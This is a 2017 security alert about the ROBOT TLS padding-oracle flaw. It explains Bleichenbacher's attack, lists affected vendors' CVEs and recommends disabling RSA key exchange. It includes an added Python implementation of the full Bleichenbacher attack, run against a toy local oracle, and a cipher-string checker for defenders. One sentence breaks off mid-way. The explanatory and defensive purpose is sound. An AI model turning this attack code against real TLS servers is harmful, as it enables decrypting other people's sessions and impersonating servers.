VERT Threat Alert: Return Of Bleichenbacher’s Oracle Threat (ROBOT)

By ISBuzz Team
Writer, Information Security Buzz | Dec 13, 2017 04:55 am PST


A team of researchers, including Tripwire VERT's Craig Young, has announced that TLS stacks from at least 8 different vendors are vulnerable to a well-known, 19-year-old protocol flaw. The affected implementations let an attacker learn whether a chosen ciphertext decrypts to a block with valid PKCS#1 v1.5 padding, and that single yes/no answer is all the attack needs.

This allows for a classic Bleichenbacher attack on RSA due to the following properties:

  1. RSA is malleable: multiplying a ciphertext by s^e mod n yields a ciphertext that decrypts to s times the original plaintext, so an attacker can "multiply" the plaintext without knowing it.
  2. PKCS#1 v1.5 is not plaintext aware: a randomly chosen value decrypts to a correctly padded block with non-negligible probability (on the order of 2^-16 for the leading 0x00 0x02 bytes alone), so an attacker can produce valid-looking ciphertexts without knowledge of the plaintext.

In 1998, Daniel Bleichenbacher published an algorithm for exploiting this with an adaptive chosen ciphertext attack, using the padding check as an oracle to narrow the plaintext down one interval at a time. Bleichenbacher argued for a plaintext-aware cryptosystem such as PKCS#1 v2 (RSA-OAEP), but TLS designers instead decided to prescribe a series of complicated countermeasures to avoid leaking error details, such as continuing the handshake with a random pre-master secret rather than reporting the padding failure.

The current vulnerabilities are the result of a general failure to properly implement or test these countermeasures in popular products.
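As an added illustration of the two properties above (this is example code written for this page, not Tripwire VERT's or the ROBOT researchers' tooling), the script below builds a toy RSA key from two known primes, implements a PKCS#1 v1.5 oracle that answers only whether a decrypted block starts with 0x00 0x02 (a "strong" oracle in the sense used later in this alert), and runs Bleichenbacher's adaptive chosen-ciphertext algorithm against it to recover a padded message from its ciphertext. The 125-bit modulus and the fixed random seed are assumptions made so it finishes in seconds; in a real attack each query is a TLS ClientKeyExchange carrying the crafted ciphertext and the oracle bit is read from the server's alert or timing.

```python
# Toy Bleichenbacher (1998) attack on PKCS#1 v1.5. Added example, not code from
# Tripwire VERT or the ROBOT researchers; the tiny 125-bit modulus and fixed seed
# are assumptions so it runs in seconds. The algorithm is unchanged for real keys.
import random

random.seed(2017)  # assumption: reproducible padding bytes

P, Q = (1 << 61) - 1, (1 << 64) - 59  # M61 and the largest 64-bit prime; toy-sized on purpose
E = 65537

def make_key(p=P, q=Q, e=E):
    """Return (d, e, n); needs Python 3.8+ for the modular inverse via pow()."""
    phi = (p - 1) * (q - 1)
    assert phi % e, "e must be coprime to phi"
    return pow(e, -1, phi), e, p * q

def pkcs1_v15_pad(msg, k):
    """EME-PKCS1-v1_5 block: 00 02 <at least 8 nonzero random bytes> 00 <msg>."""
    ps_len = k - 3 - len(msg)
    assert ps_len >= 8, "message too long for this modulus"
    ps = bytes(random.randrange(1, 256) for _ in range(ps_len))
    return b"\x00\x02" + ps + b"\x00" + msg

class PaddingOracle:
    """A TLS server that reveals whether a ClientKeyExchange decrypts to a conforming
    block.  Answering on the first two bytes alone makes this a 'strong' oracle."""
    def __init__(self, d, n):
        self.d, self.n, self.k, self.queries = d, n, (n.bit_length() + 7) // 8, 0
    def __call__(self, c):
        self.queries += 1
        return pow(c, self.d, self.n).to_bytes(self.k, "big")[:2] == b"\x00\x02"

def ceil_div(a, b):
    return -(-a // b)

def merge(intervals):
    """Union of overlapping or adjacent integer intervals, sorted."""
    out = []
    for lo, hi in sorted(intervals):
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out

def bleichenbacher(oracle, c, e, n):
    """Recover m = c^d mod n using only the oracle.  Steps follow the 1998 paper; c is
    already conforming (a real ClientKeyExchange is), so blinding is skipped (s0 = 1)."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))  # conforming plaintexts lie in [2B, 3B - 1]
    assert oracle(c), "captured ciphertext should be conforming"
    M, s, first = [(2 * B, 3 * B - 1)], ceil_div(n, 3 * B), True

    def query(t):  # RSA malleability: c * t^e decrypts to m * t mod n
        return oracle(c * pow(t, e, n) % n)

    while True:
        if first or len(M) > 1:  # steps 2a/2b: scan upward from n/3B (2a) or s + 1 (2b)
            s += 0 if first else 1
            while not query(s):
                s += 1
            first = False
        else:  # step 2c: one interval left, search only the windows it implies
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), n)
            while True:
                lo, hi = ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a
                hit = next((t for t in range(lo, hi + 1) if query(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1
        new_M = []  # step 3: narrow every interval using the s just found
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, ceil_div(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = merge(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:  # step 4: a single candidate remains
            return M[0][0]

def demo(msg=b"ROBOT"):
    """Encrypt msg, then recover it from the ciphertext and the oracle alone.
    Returns (recovered_message, number_of_oracle_queries)."""
    d, e, n = make_key()
    k = (n.bit_length() + 7) // 8
    c = pow(int.from_bytes(pkcs1_v15_pad(msg, k), "big"), e, n)  # what a sniffer records
    oracle = PaddingOracle(d, n)  # the attacker's only access to d
    block = bleichenbacher(oracle, c, e, n).to_bytes(k, "big")
    return block[block.index(b"\x00", 2) + 1:], oracle.queries

if __name__ == "__main__":
    recovered, queries = demo()
    print(f"recovered {recovered!r} after {queries} oracle queries")
```

Running the script prints the recovered plaintext and the query count. The first search phase alone needs on the order of n/B queries (about 2^16 for a modulus close to a byte boundary), which is why the targeted window search of step 2c matters and why a "weak" oracle that only answers for fully valid padding, where conforming values are rarer, takes considerably longer.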


Successful exploitation of the vulnerability allows an attacker to perform RSA private-key operations (decryption and signing) with the key configured on the vulnerable server, without ever obtaining the key itself. In practice, this means that an attacker could decrypt previously recorded sessions that were established with an RSA key exchange (the TLS_RSA_* cipher suites), which provide no forward secrecy.

An attacker who can complete the private-key operation (a forged signature or a decryption) within the duration of a TLS handshake timeout could become a full man-in-the-middle, downgrading connections to RSA encryption key exchange modes as described in DROWN.


The most complete remediation is to disable RSA encryption-based key exchange modes (the TLS_RSA_* cipher suites) where possible, leaving only (EC)DHE key exchange. This removes the attack surface for both known and not-yet-discovered padding oracles of this kind, with minimal impact on HTTPS client compatibility.
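A quick way to verify that a cipher configuration no longer admits RSA key exchange, as an added example written for this page rather than Tripwire's or the ROBOT researchers' code: the helper below feeds an OpenSSL cipher string to the local OpenSSL via Python's `ssl` module and lists every admitted suite whose key exchange is RSA encryption. It assumes the local OpenSSL describes such suites with "Kx=RSA", as `openssl ciphers -v` prints them; the weak and hardened strings are illustrative, not taken from any vendor advisory.

```python
# Added example (not Tripwire VERT's or the ROBOT researchers' code): checks an
# OpenSSL cipher string for suites that use RSA encryption for key exchange.  It
# assumes the local OpenSSL describes such suites with "Kx=RSA", as `openssl
# ciphers -v` prints them.
import ssl

def static_rsa_suites(cipher_string):
    """Names of the suites cipher_string admits whose key exchange is RSA
    encryption (TLS_RSA_*), i.e. the ones a Bleichenbacher oracle can target.
    TLS 1.3 suites are listed with Kx=any and are never flagged."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.set_ciphers(cipher_string)
    return [c["name"] for c in ctx.get_ciphers() if "Kx=RSA" in c["description"]]

# A permissive legacy string versus one that allows only forward-secret exchanges.
WEAK = "HIGH:!aNULL"
HARDENED = "ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL:!kRSA"

if __name__ == "__main__":
    for label, s in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"{label}: {static_rsa_suites(s) or 'no static RSA suites'}")
```

The `!kRSA` exclusion is the part that matters: `HIGH` and similar strength-based keywords say nothing about the key exchange, so a string can look strong while still offering suites like AES128-GCM-SHA256 that encrypt the pre-master secret with the server's RSA key. The same check applies to any server whose cipher list is expressed in OpenSSL syntax (nginx `ssl_ciphers`, Apache `SSLCipherSuite`, HAProxy `ssl-default-bind-ciphers`).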

Several vendors have released patches or support notes as indicated in the references section below and tracked on


The underlying vulnerability shows up as several distinct server behaviors (differing responses to differently malformed ciphertexts), and which behaviors a system exhibits indicates how exploitable it is. Readily exploitable systems are termed as having a "Strong Oracle," while systems with a "Weak Oracle" will on average take considerably longer to exploit because far more queries are needed.

Tripwire released coverage for CVE-2017-6168 in ASPL-753 with generic coverage scheduled for ASPL-756.


References

  - F5: BIG-IP SSL vulnerability, CVE-2017-6168
  - Citrix: TLS Padding Oracle Vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway, CVE-2017-17382
  - Radware: Security Advisory: Adaptive chosen-ciphertext attack vulnerability, CVE-2017-17427
  - Cisco: ACE (End-of-Sale and End-of-Life), CVE-2017-17428
  - Bouncy Castle: fix in 1.59 beta 9 (patch / commit), CVE-2017-13098
  - Erlang OTP: OTP 20.1.7, CVE-2017-1000385
  - WolfSSL: GitHub PR / patch, CVE-2017-13099
  - MatrixSSL: changes in 3.8.3, CVE-2016-6883
  - Java / JSSE: Oracle Critical Patch Update Advisory, October 2012, CVE-2012-5081